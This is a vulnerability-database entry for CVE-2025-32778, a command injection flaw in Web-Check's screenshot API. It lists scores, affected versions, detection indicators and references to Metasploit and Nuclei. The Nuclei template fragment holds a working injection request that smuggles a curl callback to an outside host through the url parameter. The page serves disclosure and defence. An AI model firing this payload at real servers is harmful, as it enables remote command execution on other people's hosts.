CVE-2025-32778
published 2025-04-15CVE-2025-32778: Web-Check is an all-in-one OSINT tool for analyzing any website. A command injection vulnerability exists in the screenshot API of the Web Check project…
PriorityP187critical9.3CVSS 4.0
AVNACLATNPRNUINVCHVIHVAHSCNSINSANEXCRXIRXARXMAVXMACXMATXMPRXMUIXMVCXMVIXMVAXMSCXMSIXMSAXSXAUXRXVXREXUX
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
19.98%
97.1th percentile
Web-Check is an all-in-one OSINT tool for analyzing any website. A command injection vulnerability exists in the screenshot API of the Web Check project (Lissy93/web-check). The issue stems from user-controlled input (url) being passed unsanitized into a shell command using exec(), allowing attackers to execute arbitrary system commands on the underlying host. This could be exploited by sending crafted url parameters to extract files or even establish remote access. The vulnerability has been patched by replacing exec() with execFile(), which avoids using a shell and properly isolates arguments.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lissy93 | web-check | < 2.0.1 | 2.0.1 |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP GET requests to /api/screenshot where the `url` query parameter contains shell metacharacters such as `;`, `%3b`, `%22`, `${IFS}`, or `#` — these are indicators of command injection attempts. ↗
- →Alert on outbound HTTP/DNS requests from the web server process (e.g., Node.js/Chromium) to unexpected external hosts, which may indicate successful command injection via the screenshot API (e.g., curl callback to an OOB interaction server). ↗
- →Detect use of child_process.exec() with user-supplied `url` parameter in Web-Check's directChromiumScreenshot() function; vulnerable instances will NOT have commit 0e4958aa10b2650d32439a799f6fc83a7cd46cef applied. ↗
- →Use interactsh or similar OOB callback detection: a successful probe will trigger an HTTP interaction from the target server, confirming RCE via the injected curl command. ↗
- →Fingerprint vulnerable Web-Check instances by checking for the string 'Web Check' in the response body (case-insensitive) before probing the screenshot endpoint. ↗
- ·The vulnerability only exists in Web-Check instances running code prior to commit 0e4958aa10b2650d32439a799f6fc83a7cd46cef. Patched instances use execFile() instead of exec(), which does not invoke a shell and therefore neutralizes the injection. ↗
- ·The injection point is specifically the `url` query parameter of the /api/screenshot endpoint; other endpoints are not described as affected by this CVE. ↗
CVSS provenance
nvdv4.09.3CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Metasploit
Web-Check Screenshot API Command Injection RCE
metasploit
Web-Check Screenshot API Command Injection RCE
Web-Check Screenshot API Command Injection RCE
This module exploits a command injection vulnerability in Web-Check's `/api/screenshot` endpoint. The `directChromiumScreenshot()` function uses `child_process.exec()` with unsanitized user input, allowing command injection via URL query parameters. The vulnerability was patched in commit 0e4958aa10b2650d32439a799f6fc83a7cd46cef by replacing `exec()` with `execFile()`.
Nuclei
Web-Check < 2.0.1 Screenshot API - OS Command Injection
nuclei·CVSS 9.3
CVE-2025-32778 [CRITICAL] Web-Check < 2.0.1 Screenshot API - OS Command Injection
Web-Check Web Check"
part: body
case-insensitive: true
internal: true
- raw:
- |
GET /api/screenshot?url=http://x%22%3bcurl${IFS}http://{{interactsh-url}}%3b%23 HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: status
status:
- 200
# digest: 4a0a00473045022100bc58bade2be3c10cdfbca0230364a6c1ac7425e0d259f82414df47c9aa33cef202206cb78f9136f20b54edbeadd1a7df64c37f1fa82527e1e94fbaacf73839ba0f88:922c64590222798bb761d5b6d8e72950
2025-04-15
Published
Exploited in the wild